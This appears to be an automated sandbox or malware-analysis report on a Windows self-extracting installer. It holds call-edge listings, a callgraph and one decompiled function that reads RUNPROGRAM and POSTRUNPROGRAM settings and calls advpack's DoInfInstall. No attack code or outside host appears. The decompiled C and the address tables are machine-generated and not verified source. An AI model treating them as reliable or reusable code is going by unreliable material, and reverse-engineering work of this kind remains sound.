CreateDirectoryA 2894->2895 2895->2893 2897 212510 2896->2897 2898 21255b 2896->2898 2899 21658a CharPrevA 2897->2899 2900 216ce0 4 API calls 2898->2900 2901 212522 WritePrivateProfileStringA _lopen 2899->2901 2902 212569 2900->2902 2901->2898 2903 212548 _llseek _lclose 2901->2903 2902->2657 2903->2898 2905 211b25 2904->2905 3009 211a84 2905->3009 2907 211b57 2908 21658a CharPrevA 2907->2908 2910 211b8c 2907->2910 2908->2910 2909 2166c8 2 API calls 2911 211bd1 2909->2911 2910->2909 2912 211d73 2911->2912 2913 211bd9 CompareStringA 2911->2913 2915 2166c8 2 API calls 2912->2915 2913->2912 2914 211bf7 GetFileAttributesA 2913->2914 2916 211d53 2914->2916 2917 211c0d 2914->2917 2918 211d7d 2915->2918 2919 211d64 2916->2919 2917->2916 2924 211a84 2 API calls 2917->2924 2920 211d81 CompareStringA 2918->2920 2921 211df8 LocalAlloc 2918->2921 2922 2144b9 20 API calls 2919->2922 2920->2921 2931 211d9b 2920->2931 2921->2919 2923 211e0b GetFileAttributesA 2921->2923 2925 211d6c 2922->2925 2926 211e1d 2923->2926 2944 211e45 2923->2944 2927 211c31 2924->2927 2930 216ce0 4 API calls 2925->2930 2926->2944 2928 211c50 LocalAlloc 2927->2928 2935 211a84 2 API calls 2927->2935 2928->2919 2929 211c67 GetPrivateProfileIntA GetPrivateProfileStringA 2928->2929 2937 211cf8 2929->2937 2942 211cc2 2929->2942 2934 211ea1 2930->2934 2931->2931 2936 211dbe LocalAlloc 2931->2936 2934->2678 2935->2928 2936->2919 2938 211de1 2936->2938 2940 211d23 2937->2940 2941 211d09 GetShortPathNameA 2937->2941 2939 21171e _vsnprintf 2938->2939 2939->2942 2943 21171e _vsnprintf 2940->2943 2941->2940 2942->2925 2943->2942 3015 212aac 2944->3015 2950 21209a 2945->2950 2954 212256 2945->2954 2946 216ce0 4 API calls 2947 212263 2946->2947 2947->2678 2948 21171e _vsnprintf 2949 2120af RegQueryValueExA 2948->2949 2949->2950 2951 2120dc 2949->2951 2950->2948 2950->2951 2952 2120e4 RegCloseKey 2951->2952 2953 2120fb GetSystemDirectoryA 2951->2953 2952->2954 2955 21658a CharPrevA 2953->2955 2954->2946 2956 21211b LoadLibraryA 2955->2956 2957 212179 GetModuleFileNameA 2956->2957 2958 21212e GetProcAddress FreeLibrary 2956->2958 2959 2121de RegCloseKey 2957->2959 2963 212177 2957->2963 2958->2957 2960 21214e GetSystemDirectoryA 2958->2960 2959->2954 2961 212165 2960->2961 2960->2963 2962 21658a CharPrevA 2961->2962 2962->2963 2963->2963 2964 2121b7 LocalAlloc 2963->2964 2965 2121cd 2964->2965 2966 2121ec 2964->2966 2967 2144b9 20 API calls 2965->2967 2968 21171e _vsnprintf 2966->2968 2967->2959 2969 212218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2954 2972 214016 CreateProcessA 2971->2972 2983 214106 2971->2983 2973 214041 WaitForSingleObject GetExitCodeProcess 2972->2973 2974 2140c4 2972->2974 2977 214070 2973->2977 2976 216285 GetLastError 2974->2976 2975 216ce0 4 API calls 2978 214117 2975->2978 2980 2140c9 GetLastError FormatMessageA 2976->2980 3042 21411b 2977->3042 2978->2678 2982 2144b9 20 API calls 2980->2982 2981 214096 CloseHandle CloseHandle 2981->2983 2984 2140ba 2981->2984 2982->2983 2983->2975 2984->2983 2986 2164c2 2985->2986 2987 21658a CharPrevA 2986->2987 2988 2164d8 GetFileAttributesA 2987->2988 2989 216501 LoadLibraryA 2988->2989 2990 2164ea 2988->2990 2992 216508 2989->2992 2990->2989 2991 2164ee LoadLibraryExA 2990->2991 2991->2992 2993 216ce0 4 API calls 2992->2993 2994 216513 2993->2994 2994->2696 2996 212289 RegOpenKeyExA 2995->2996 2998 212381 2995->2998 2996->2998 2999 2122b1 RegQueryValueExA 2996->2999 2997 216ce0 4 API calls 3000 21238c 2997->3000 2998->2997 3001 212374 RegCloseKey 2999->3001 3002 2122e6 memset GetSystemDirectoryA 2999->3002 3000->2674 3001->2998 3003 212321 3002->3003 3004 21230f 3002->3004 3006 21171e _vsnprintf 3003->3006 3005 21658a CharPrevA 3004->3005 3005->3003 3007 21233f RegSetValueExA 3006->3007 3007->3001 3010 211a9a 3009->3010 3012 211aaf 3010->3012 3013 211aba 3010->3013 3028 21667f 3010->3028 3012->3013 3014 21667f 2 API calls 3012->3014 3013->2907 3014->3012 3016 212ad4 GetModuleFileNameA 3015->3016 3017 212be6 3015->3017 3027 212b02 3016->3027 3018 216ce0 4 API calls 3017->3018 3019 212bf5 3018->3019 3019->2925 3020 212af1 IsDBCSLeadByte 3020->3027 3021 212b11 CharNextA CharUpperA 3023 212b8d CharUpperA 3021->3023 3021->3027 3022 212bca CharNextA 3024 212bd3 CharNextA 3022->3024 3023->3027 3024->3027 3026 212b43 CharPrevA 3026->3027 3027->3017 3027->3020 3027->3021 3027->3022 3027->3024 3027->3026 3033 2165e8 3027->3033 3029 216689 3028->3029 3030 216648 IsDBCSLeadByte 3029->3030 3031 2166a5 3029->3031 3032 216697 CharNextA 3029->3032 3030->3029 3031->3010 3032->3029 3034 2165f4 3033->3034 3034->3034 3035 2165fb CharPrevA 3034->3035 3036 216611 CharPrevA 3035->3036 3037 21660b 3036->3037 3038 21661e 3036->3038 3037->3036 3037->3038 3039 21663d 3038->3039 3040 216634 CharNextA 3038->3040 3041 216627 CharPrevA 3038->3041 3039->3027 3040->3039 3041->3039 3041->3040 3043 214132 3042->3043 3045 21412a 3042->3045 3046 211ea7 3043->3046 3045->2981 3047 211ed3 3046->3047 3048 211eba 3046->3048 3047->3045 3049 21256d 15 API calls 3048->3049 3049->3047 3051 211ff0 RegOpenKeyExA 3050->3051 3052 212026 3050->3052 3051->3052 3053 21200f RegDeleteValueA RegCloseKey 3051->3053 3052->2319 3053->3052 3119 216a20 __getmainargs 3120 2119e0 3121 211a24 GetDesktopWindow 3120->3121 3122 211a03 3120->3122 3129 2143d0 6 API calls 3121->3129 3124 211a16 EndDialog 3122->3124 3125 211a20 3122->3125 3124->3125 3127 216ce0 4 API calls 3125->3127 3128 211a7e 3127->3128 3130 214463 SetWindowPos 3129->3130 3132 216ce0 4 API calls 3130->3132 3133 211a33 LoadStringA SetDlgItemTextA MessageBeep 3132->3133 3133->3125 3134 216bef _XcptFilter 3135 217270 _except_handler4_common 3136 2169b0 3137 2169b5 3136->3137 3145 216fbe GetModuleHandleW 3137->3145 3139 2169c1 __set_app_type __p__fmode __p__commode 3140 2169f9 3139->3140 3141 216a02 __setusermatherr 3140->3141 3142 216a0e 3140->3142 3141->3142 3147 2171ef _controlfp 3142->3147 3144 216a13 3146 216fcf 3145->3146 3146->3139 3147->3144 3148 2134f0 3149 213504 3148->3149 3153 2135b8 3148->3153 3150 21351b 3149->3150 3151 2135be GetDesktopWindow 3149->3151 3149->3153 3154 21354f 3150->3154 3155 21351f 3150->3155 3157 2143d0 11 API calls 3151->3157 3152 213526 3153->3152 3156 213671 EndDialog 3153->3156 3154->3152 3160 213559 ResetEvent 3154->3160 3155->3152 3159 21352d TerminateThread EndDialog 3155->3159 3156->3152 3158 2135d6 3157->3158 3161 2135e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3158->3161 3162 21361d SetWindowTextA CreateThread 3158->3162 3159->3152 3163 2144b9 20 API calls 3160->3163 3161->3162 3162->3152 3164 213646 3162->3164 3165 213581 3163->3165 3166 2144b9 20 API calls 3164->3166 3167 21359b SetEvent 3165->3167 3168 21358a SetEvent 3165->3168 3166->3153 3169 213680 4 API calls 3167->3169 3168->3152 3169->3153 3170 216ef0 3171 216f2d 3170->3171 3172 216f02 3170->3172 3172->3171 3173 216f27 ?terminate@ 3172->3173 3173->3171 3054 216f40 SetUnhandledExceptionFilter 3055 214cc0 GlobalFree 3174 214200 3175 21420b SendMessageA 3174->3175 3176 21421e 3174->3176 3175->3176 3177 213100 3178 213111 3177->3178 3179 2131b0 3177->3179 3182 21311d 3178->3182 3183 213149 GetDesktopWindow 3178->3183 3180 2131b9 SendDlgItemMessageA 3179->3180 3181 213141 3179->3181 3180->3181 3182->3181 3184 213138 EndDialog 3182->3184 3185 2143d0 11 API calls 3183->3185 3184->3181 3186 21315d 6 API calls 3185->3186 3186->3181 3187 214bc0 3189 214c05 3187->3189 3190 214bd7 3187->3190 3188 214c1b SetFilePointer 3188->3190 3189->3188 3189->3190 3191 2130c0 3192 2130de CallWindowProcA 3191->3192 3193 2130ce 3191->3193 3194 2130da 3192->3194 3193->3192 3193->3194 3195 2163c0 3196 216407 3195->3196 3197 21658a CharPrevA 3196->3197 3198 216415 CreateFileA 3197->3198 3199 216448 WriteFile 3198->3199 3200 21643a 3198->3200 3201 216465 CloseHandle 3199->3201 3203 216ce0 4 API calls 3200->3203 3201->3200 3204 21648f 3203->3204 3205 216c03 3206 216c17 _exit 3205->3206 3207 216c1e 3205->3207 3206->3207 3208 216c27 _cexit 3207->3208 3209 216c32 3207->3209 3208->3209 3056 214ad0 3064 213680 3056->3064 3059 214ae9 3060 214aee WriteFile 3061 214b14 3060->3061 3062 214b0f 3060->3062 3061->3062 3063 214b3b SendDlgItemMessageA 3061->3063 3063->3062 3065 213691 MsgWaitForMultipleObjects 3064->3065 3066 2136a9 PeekMessageA 3065->3066 3067 2136e8 3065->3067 3066->3065 3070 2136bc 3066->3070 3067->3059 3067->3060 3068 2136c7 DispatchMessageA 3069 2136d1 PeekMessageA 3068->3069 3069->3070 3070->3065 3070->3067 3070->3068 3070->3069 3071 214cd0 3072 214cf4 3071->3072 3073 214d0b 3071->3073 3074 214d02 3072->3074 3075 214b60 FindCloseChangeNotification 3072->3075 3073->3074 3077 214dcb 3073->3077 3080 214d25 3073->3080 3076 216ce0 4 API calls 3074->3076 3075->3074 3078 214e95 3076->3078 3079 214dd4 SetDlgItemTextA 3077->3079 3081 214de3 3077->3081 3079->3081 3080->3074 3094 214c37 3080->3094 3081->3074 3099 21476d 3081->3099 3085 214e38 3085->3074 3087 214980 25 API calls 3085->3087 3086 214b60 FindCloseChangeNotification 3088 214d99 SetFileAttributesA 3086->3088 3089 214e56 3087->3089 3088->3074 3089->3074 3090 214e64 3089->3090 3108 2147e0 LocalAlloc 3090->3108 3093 214e6f 3093->3074 3095 214c88 3094->3095 3096 214c4c DosDateTimeToFileTime 3094->3096 3095->3074 3095->3086 3096->3095 3097 214c5e LocalFileTimeToFileTime 3096->3097 3097->3095 3098 214c70 SetFileTime 3097->3098 3098->3095 3117 2166ae GetFileAttributesA 3099->3117 3101 21477b 3101->3085 3103 2147cc SetFileAttributesA 3104 2147db 3103->3104 3104->3085 3105 216517 24 API calls 3106 2147b1 3105->3106 3106->3103 3106->3104 3107 2147c2 3106->3107 3107->3103 3109 2147f6 3108->3109 3110 21480f LocalAlloc 3108->3110 3111 2144b9 20 API calls 3109->3111 3113 214831 3110->3113 3116 21480b 3110->3116 3111->3116 3114 2144b9 20 API calls 3113->3114 3115 214846 LocalFree 3114->3115 3115->3116 3116->3093 3118 214777 3117->3118 3118->3101 3118->3103 3118->3105 3210 213210 3211 213227 3210->3211 3212 21328e EndDialog 3210->3212 3213 2133e2 GetDesktopWindow 3211->3213 3214 213235 3211->3214 3228 213239 3212->3228 3216 2143d0 11 API calls 3213->3216 3218 2132dd GetDlgItemTextA 3214->3218 3219 21324c 3214->3219 3214->3228 3217 2133f1 SetWindowTextA SendDlgItemMessageA 3216->3217 3220 21341f GetDlgItem EnableWindow 3217->3220 3217->3228 3221 213366 3218->3221 3229 2132fc 3218->3229 3222 213251 3219->3222 3223 2132c5 EndDialog 3219->3223 3220->3228 3225 2144b9 20 API calls 3221->3225 3224 21325c LoadStringA 3222->3224 3222->3228 3223->3228 3226 213294 3224->3226 3227 21327b 3224->3227 3225->3228 3248 214224 LoadLibraryA 3226->3248 3233 2144b9 20 API calls 3227->3233 3229->3221 3232 213331 GetFileAttributesA 3229->3232 3235 21337c 3232->3235 3236 21333f 3232->3236 3233->3212 3234 2132a5 SetDlgItemTextA 3234->3227 3234->3228 3237 21658a CharPrevA 3235->3237 3238 2144b9 20 API calls 3236->3238 3239 21338d 3237->3239 3240 213351 3238->3240 3241 2158c8 27 API calls 3239->3241 3240->3228 3242 21335a CreateDirectoryA 3240->3242 3243 213394 3241->3243 3242->3221 3242->3235 3243->3221 3244 2133a4 3243->3244 3245 2133c7 EndDialog 3244->3245 3246 21597d 34 API calls 3244->3246 3245->3228 3247 2133c3 3246->3247 3247->3228 3247->3245 3249 2143b2 3248->3249 3250 214246 GetProcAddress 3248->3250 3254 2144b9 20 API calls 3249->3254 3251 2143a4 FreeLibrary 3250->3251 3252 21425d GetProcAddress 3250->3252 3251->3249 3252->3251 3253 214274 GetProcAddress 3252->3253 3253->3251 3255 21428b 3253->3255 3256 21329d 3254->3256 3257 214295 GetTempPathA 3255->3257 3261 2142e1 3255->3261 3256->3228 3256->3234 3258 2142ad 3257->3258 3258->3258 3259 2142b4 CharPrevA 3258->3259 3260 2142d0 CharPrevA 3259->3260 3259->3261 3260->3261 3262 214390 FreeLibrary 3261->3262 3262->3256 3263 214a50 3264 214a9f ReadFile 3263->3264 3266 214a66 3263->3266 3265 214abb 3264->3265 3266->3265 3267 214a82 memcpy 3266->3267 3267->3265 3268 213450 3269 2134d3 EndDialog 3268->3269 3270 21345e 3268->3270 3273 21346a 3269->3273 3271 21349a GetDesktopWindow 3270->3271 3274 213465 3270->3274 3272 2143d0 11 API calls 3271->3272 3275 2134ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3272->3275 3274->3273 3276 21348c EndDialog 3274->3276 3275->3273 3276->3273

                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                        callgraph 0 Function_00217120 1 Function_00216A20 2 Function_00214224 65 Function_002144B9 2->65 69 Function_00211680 2->69 3 Function_00213B26 20 Function_00216517 3->20 83 Function_00216298 3->83 86 Function_00214FE0 3->86 4 Function_00216E2A 102 Function_00216CF0 4->102 5 Function_0021202A 24 Function_0021171E 5->24 5->65 76 Function_0021658A 5->76 89 Function_00216CE0 5->89 6 Function_00212630 6->65 6->89 7 Function_00214C37 8 Function_00213A3F 8->20 8->65 72 Function_00216285 8->72 77 Function_0021468F 8->77 9 Function_00216C3F 10 Function_00217000 11 Function_00214200 12 Function_00213100 119 Function_002143D0 12->119 13 Function_00216C03 44 Function_0021724D 13->44 14 Function_00214702 63 Function_002116B3 14->63 14->69 15 Function_00217208 16 Function_0021490C 17 Function_00213210 17->2 40 Function_0021597D 17->40 17->65 17->76 114 Function_002158C8 17->114 17->119 18 Function_00217010 19 Function_00215C17 20->65 21 Function_0021411B 58 Function_00211EA7 21->58 22 Function_00212F1D 22->3 22->8 25 Function_0021621E 22->25 30 Function_00215164 22->30 33 Function_00214169 22->33 34 Function_0021256D 22->34 52 Function_002155A0 22->52 55 Function_00213BA2 22->55 22->65 22->72 22->76 22->89 92 Function_002151E5 22->92 23 Function_0021681F 23->89 105 Function_002166F9 23->105 25->40 25->65 25->72 25->89 26 Function_00216A60 26->9 26->15 28 Function_00217060 26->28 26->44 48 Function_00217155 26->48 106 Function_00212BFB 26->106 27 Function_00214B60 28->0 28->18 29 Function_00216760 30->65 30->77 30->83 31 Function_00215467 31->40 50 Function_002153A1 31->50 67 Function_00211781 31->67 31->69 31->72 31->76 31->89 31->114 32 Function_00212267 32->24 32->76 32->89 33->65 33->77 90 Function_002124E0 34->90 35 Function_0021476D 35->20 61 Function_002166AE 35->61 36 Function_00217270 37 Function_00216C70 38 Function_00212773 38->67 38->69 38->76 38->89 39 Function_0021487A 39->16 40->65 40->72 75 Function_0021268B 40->75 40->89 41 Function_0021667F 43 Function_00216648 41->43 42 Function_00216F40 45 Function_00214A50 46 Function_00213450 46->119 47 Function_00216952 49 Function_00216F54 49->15 49->44 50->24 50->69 50->76 50->89 51 Function_00216FA1 52->6 52->20 52->31 52->40 52->47 52->65 52->67 52->72 52->76 52->77 52->89 53 Function_00214CA0 54 Function_002118A3 54->89 101 Function_002117EE 54->101 55->5 55->32 55->65 55->67 55->72 55->77 81 Function_00216495 55->81 55->89 93 Function_00211AE8 55->93 97 Function_00213FEF 55->97 56 Function_002172A2 57 Function_00216FA5 57->44 58->34 59 Function_00212CAA 59->20 59->54 59->65 59->77 78 Function_00212390 59->78 84 Function_00215C9E 59->84 59->89 100 Function_002136EE 59->100 60 Function_00212AAC 60->69 60->89 95 Function_002165E8 60->95 116 Function_002117C8 60->116 62 Function_002169B0 62->10 62->37 66 Function_00216FBE 62->66 98 Function_002171EF 62->98 63->67 64 Function_002152B6 64->67 64->78 85 Function_00211FE1 64->85 64->89 64->95 65->23 65->24 65->69 65->89 113 Function_002167C9 65->113 66->49 68 Function_00214980 68->39 68->65 69->67 70 Function_00213680 71 Function_00216380 73 Function_00211A84 73->41 74 Function_00212A89 75->24 75->65 75->89 76->63 78->63 78->69 78->76 78->78 78->89 79 Function_00211F90 79->58 79->65 79->89 80 Function_00216793 81->67 81->76 81->89 82 Function_00214E99 82->69 83->24 83->89 84->4 84->19 84->41 84->65 84->69 84->76 88 Function_002131E0 84->88 84->89 115 Function_002166C8 84->115 86->65 86->77 107 Function_00214EFD 86->107 87 Function_002147E0 87->65 87->69 89->102 90->76 90->89 91 Function_002119E0 91->89 91->119 92->65 92->72 92->77 93->24 93->60 93->63 93->65 93->67 93->69 93->73 93->76 93->89 93->115 94 Function_002128E8 94->38 94->74 96 Function_002170EB 97->21 97->65 97->72 97->89 99 Function_00216BEF 100->23 100->65 100->74 100->89 100->94 100->113 101->89 103 Function_002134F0 103->65 103->70 103->119 104 Function_00216EF0 106->22 106->59 106->64 106->79 107->27 107->68 107->89 108 Function_002170FE 109 Function_00214CC0 110 Function_00214BC0 111 Function_002130C0 112 Function_002163C0 112->67 112->76 112->89 113->80 114->65 114->69 114->72 114->76 115->43 117 Function_00214CD0 117->7 117->14 117->27 117->35 117->68 117->82 117->87 117->89 118 Function_00214AD0 118->70 119->89

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 00213BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMONCrypto
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 36 213ba2-213bd9 37 213bdb-213bee call 21468f 36->37 38 213bfd-213bff 36->38 44 213d13-213d30 call 2144b9 37->44 45 213bf4-213bf7 37->45 39 213c03-213c28 memset 38->39 41 213d35-213d48 call 211781 39->41 42 213c2e-213c40 call 21468f 39->42 48 213d4d-213d52 41->48 42->44 53 213c46-213c49 42->53 55 213f4d 44->55 45->38 45->44 51 213d54-213d6c call 21468f 48->51 52 213d9e-213db6 call 211ae8 48->52 51->44 65 213d6e-213d75 51->65 52->55 69 213dbc-213dc2 52->69 53->44 57 213c4f-213c56 53->57 59 213f4f-213f63 call 216ce0 55->59 61 213c60-213c65 57->61 62 213c58-213c5e 57->62 67 213c75-213c7c 61->67 68 213c67-213c6d 61->68 66 213c6e-213c73 62->66 71 213d7b-213d98 CompareStringA 65->71 72 213fda-213fe1 65->72 73 213c87-213c89 66->73 67->73 76 213c7e-213c82 67->76 68->66 74 213dc4-213dce 69->74 75 213de6-213de8 69->75 71->52 71->72 79 213fe3 call 212267 72->79 80 213fe8-213fea 72->80 73->48 82 213c8f-213c98 73->82 74->75 81 213dd0-213dd7 74->81 77 213f0b-213f15 call 213fef 75->77 78 213dee-213df5 75->78 76->73 95 213f1a-213f1c 77->95 85 213fab-213fd2 call 2144b9 LocalFree 78->85 86 213dfb-213dfd 78->86 79->80 80->59 81->75 89 213dd9-213ddb 81->89 83 213cf1-213cf3 82->83 84 213c9a-213c9c 82->84 83->52 94 213cf9-213d11 call 21468f 83->94 91 213ca5-213ca7 84->91 92 213c9e-213ca3 84->92 85->55 86->77 93 213e03-213e0a 86->93 89->78 96 213ddd-213de1 call 21202a 89->96 91->55 100 213cad 91->100 99 213cb2-213cc5 call 21468f 92->99 93->77 101 213e10-213e19 call 216495 93->101 94->44 94->48 103 213f46-213f47 LocalFree 95->103 104 213f1e-213f2d LocalFree 95->104 96->75 99->44 112 213cc7-213ce8 CompareStringA 99->112 100->99 113 213f92-213fa9 call 2144b9 101->113 114 213e1f-213e36 GetProcAddress 101->114 103->55 108 213f33-213f3b 104->108 109 213fd7-213fd9 104->109 108->39 109->72 112->83 115 213cea-213ced 112->115 126 213f7c-213f90 LocalFree call 216285 113->126 116 213f64-213f76 call 2144b9 FreeLibrary 114->116 117 213e3c-213e80 114->117 115->83 116->126 120 213e82-213e87 117->120 121 213e8b-213e94 117->121 120->121 124 213e96-213e9b 121->124 125 213e9f-213ea2 121->125 124->125 128 213ea4-213ea9 125->128 129 213ead-213eb6 125->129 126->55 128->129 130 213ec1-213ec3 129->130 131 213eb8-213ebd 129->131 133 213ec5-213eca 130->133 134 213ece-213eec 130->134 131->130 133->134 137 213ef5-213efd 134->137 138 213eee-213ef3 134->138 139 213f40 FreeLibrary 137->139 140 213eff-213f09 FreeLibrary 137->140 138->137 139->103 140->104
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00213BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x218004; // 0x58ac7c6d
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x219124 =  *0x219124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x218a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x218c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0021468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E002144B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x219124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00211AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00216CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00213FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x218580;
													if( *0x218580 != 0) {
														E00212267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x218180;
											if( *0x218180 == 0) {
												_t146 = 0x4c7;
												E002144B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x219124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x219a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00216495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E002144B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x219124 = E00216285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E002144B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x218a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x219a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x218a38 & 0x0000ffff;
											_v380 = 0x219154;
											_v376 = _t151;
											_v372 = 0x2191e4;
											_v360 = _t97;
											if( *0x218a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x219a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x218d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x219a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x21a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x219124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x219a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x218a20;
										if( *0x218a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0021202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0021468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x218c42;
									if( *0x218c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x218a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0021468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0021468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00211781( &_v276, 0x104, _t130, 0x218c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0021468F(_t130, 0x219a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}





























































                                                                                                                                                                                                        0x00213baa
                                                                                                                                                                                                        0x00213bb0
                                                                                                                                                                                                        0x00213bb7
                                                                                                                                                                                                        0x00213bc0
                                                                                                                                                                                                        0x00213bc2
                                                                                                                                                                                                        0x00213bc9
                                                                                                                                                                                                        0x00213bcb
                                                                                                                                                                                                        0x00213bcf
                                                                                                                                                                                                        0x00213bd3
                                                                                                                                                                                                        0x00213bd9
                                                                                                                                                                                                        0x00213bfd
